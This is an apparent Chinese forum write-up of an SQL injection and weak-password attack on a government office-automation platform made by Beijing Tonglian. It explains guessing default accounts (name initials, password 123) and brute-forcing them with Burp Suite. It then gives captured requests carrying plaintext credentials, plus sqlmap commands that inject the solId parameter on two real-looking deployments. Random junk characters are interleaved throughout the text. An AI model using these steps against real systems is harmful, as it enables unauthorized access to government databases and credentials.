|
! [% z/ A1 v; \* ^7 s; S F7 d
$ Y( ^! ]; z' j; x5 U4 p( w" v 3 o1 K L( c0 V1 v
" m6 P* k( I8 m! ? p
平台简介:' w& B5 H2 Q& \- m: f
( U B" Z& C; Y
* n5 F) a- f: B m4 |3 { ) F' X! e' E) }8 s6 M
6 R7 P. v; z, M5 t g) T5 R2 q0 H0 j7 Y6 \- g
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 / [; w4 |% {. Z- J
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 i$ Q+ {( j6 D8 K
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
K$ Q! N* I" k- R
[7 v l6 Y; S
, [ V& d0 l" Q6 |. V: g
$ O+ e% q7 `% ]2 z' @/ X/ z' _, e ' K2 O/ T9 p7 O
; ^# r% r; K- O9 B 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* J P# f+ |+ s4 l5 e. f
( p% B7 C( H% @# Q
' [/ Q7 b7 Z7 j: O( E: {
! g7 T' M$ ~$ u+ K& i( \; x9 d
3 S5 C. _) \0 @) h' m: k
7 \3 i$ _# K! ~$ b$ [) N! o
http://1.1.1.1:7197/cap-aco/#(案例2-)% b% ~9 E6 ~. X* y* h
9 b7 ]. C- w. U! y: J- W* [
$ O6 P9 W4 V4 F8 G$ K: n! C
http://www.XXOO.com (案例1-官网网站)
; B: i; O4 H$ J9 W7 j3 j8 X8 t . @# [2 e7 I' B$ ^7 G: ]& Q& \
5 K' G0 y! E9 n6 {
4 n" d+ I1 _3 h- i9 i
# }1 Q. @8 W$ S' y) e3 ]% Z4 N/ o* _! x: C V Y) ^
漏洞详情:
# C4 e" t# A1 e2 e2 Y. z) } 2 E5 ~3 e h3 ^
& }6 [1 Y$ O- M$ y2 f# Y% F
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% C4 Q2 ^4 e) n9 |0 S5 y% R 0 S( d! ]5 x6 S# @$ ]6 H
# X. \8 j$ b: \* T; O" }6 U 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
7 [# C, F8 L2 H" H. ? 3 G/ r% |+ y5 d" t" ^
9 ^! H- U$ I5 z' f 7 J# [0 S: Z6 D- l/ ~' W6 f- ^
, _4 ?6 H/ E' @! A+ ^
0 H6 |+ u- E' h- x9 f
6 Z9 H4 A; V" `" V& F 2 Q7 c0 `9 ^# F+ V2 ~
' `3 d: A2 ` S9 E% j status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:2 }9 y0 @ g4 y# ?4 U4 j( e! m: R
. [/ M8 K2 y; P# g' A2 l6 Q" ^ \
* G( I" k P9 {6 B+ q
1、案例1-官方网站9 S/ p r6 @1 T4 Y/ N' M. Z
6 U; g ?& y$ p5 b# X, z6 o1 H) R1 [" a% {/ ?, L
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.14 e. s3 F9 {, | L) i9 Y% S
9 i, ?$ \0 L4 c
7 o" A3 Y% i+ @/ u$ F6 U/ ^3 h* k Host: www.XXOO.com9 J y" b3 G2 b. Y7 y
" a- b! J9 h, x, U! X
8 u4 L$ g ?9 Y
Proxy-Connection: Keep-Alive8 w( t+ Y( i. T& G* P
/ y. Y3 v( I3 ~
5 [2 K9 n, w: u Accept: application/json, text/javascript, */*; q=0.01
: r) G( i1 D3 A9 Y& M + i/ c& U/ M/ Z9 D- c
% i7 t0 ?/ W" r, j# y- e0 c; [
Accept-Language: zh-CN
! x; m: G1 b$ m' A ; B; q4 F+ E- y7 B5 N9 L6 W* Q
9 T" i' C* u+ X1 X Content-Type: application/json
! l }; w. t6 P) U6 U
) C6 S l9 k8 \! |3 }6 \% d+ [) d8 w" a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
; W5 b+ y: W( T, O# S5 e) E
+ h) w5 w5 P* n# ]+ S
9 `8 y3 y% V5 \ X-Requested-With: XMLHttpRequest1 w- Z Z7 B' w* {. c! h/ Z
1 ~/ r+ T. U6 q" T6 D& M* e
9 U! P7 K' J& O: S5 h9 v6 L Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0020 @6 O& \" T: h- w& p0 X. y# B0 ]
, A R, _3 B; }0 U! V" F
! s4 v7 ^& t: p3 @) M Accept-Encoding: gzip, deflate, sdch9 C: h: D$ {' y, d
1 ^" X- w" d' Y3 M y$ Q! Q' v, D; n3 x* n8 B. h
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
" h" b$ o, [2 Y0 D
5 V, v$ a5 R1 d7 @8 r1 q
6 S5 M! l K) \( j6 X5 l 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:0 c" g+ u# o# g3 j
$ H: h4 D2 j m/ R
" J9 ?" x5 P3 ?! D
8 N5 }$ V1 P) `( Y* d7 [
) B( _ I4 S3 A# Y3 Q$ m9 h' ?6 w
4 }# b3 E+ o% m; A: R
" q v* _9 c+ H1 G* a9 K' Y
. A5 r$ q7 ?6 r( h5 b
, X# u! t8 m3 l# s& M+ D 6 m: x& b N3 L& \1 x6 R% ]) k
0 `! P( b( Z* I/ |" \; ?0 I* ~2 R7 B3 j, Z
1 b. u1 b+ {0 j) s3 J
! l* x3 I l# q3 E! R0 u* t
" } {9 I5 w' A+ H$ T: W" @) v2 ] $ d, Z! ~8 }8 V/ d
; n& R* S1 s5 G% J4 b; w6 ]/ @
/ q4 h" o, F9 E$ w" V$ `5 U 2、案例2-某天河云平台7 O- O, R/ _ i# _9 n
- w4 J; X& w, g8 A& [* e* \9 l( O
4 C$ V4 J, L( m: L. s7 K+ M# U+ D GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ r& I; h; G* |. l' W9 q - E/ Y4 b9 S! f% R
5 D! N h5 p5 G. E" W Host: 1.1.1.:7197$ E6 P" Z' V9 p4 h. u
( Y: H* i( o0 x4 b% F( a- B/ ~% w& o" s3 h
Accept: application/json, text/javascript, */*; q=0.019 k- s) o9 g5 E) t; t
; b2 M6 u; a5 l2 n) Q6 \
. Z, k& M0 J( z+ S6 u X-Requested-With: XMLHttpRequest$ X9 B4 t" R" [
- P" R+ T1 A0 d- R! v
$ X; Y4 g$ B3 I4 ]) l4 Q \ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0+ A# u4 n' k8 V% _; s0 ?' o
8 J; o. F$ _; h$ i1 M" J; m( w
$ @0 Y) l3 L" b* Y5 |; I4 o: h4 R3 K
Content-Type: application/json; c' T. b8 j* s; [ e' z* P# ~
+ k2 `; K, T4 K; @ f' X/ }
5 h. @1 w" t) g# s6 N$ A Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10082 f. a( R& }( {- \/ Z! t: F
& M, ]; W& n; I( O% K4 `: M5 S- J3 @
Accept-Language: zh-CN,zh;q=0.8
( c: N: o+ G; v/ L7 d! }$ J % [$ y/ {) j# @7 i
+ u+ p, |5 K1 e4 S$ c% p
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
2 N+ H3 M& v9 w% s) n 5 y4 \4 Z" ?$ t. p6 \; n z. p
0 F) z$ m0 }3 {3 e2 z2 F" s Connection: close D* a x* u2 a+ E/ p `
& J$ E/ F& Y P$ s& k" }( ]7 t/ [" T# S' M
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
8 U) O9 ` Z# o% C1 R4 y1 { a! R- l& H9 E6 F$ x* j8 S
, I$ o4 J. c0 T+ q
: { f- G6 j8 v6 X# x0 S & c0 W& E, k$ X
5 t% P; Q! X& `. m9 f& R8 Y3 X
4 ?" r" l" n. W |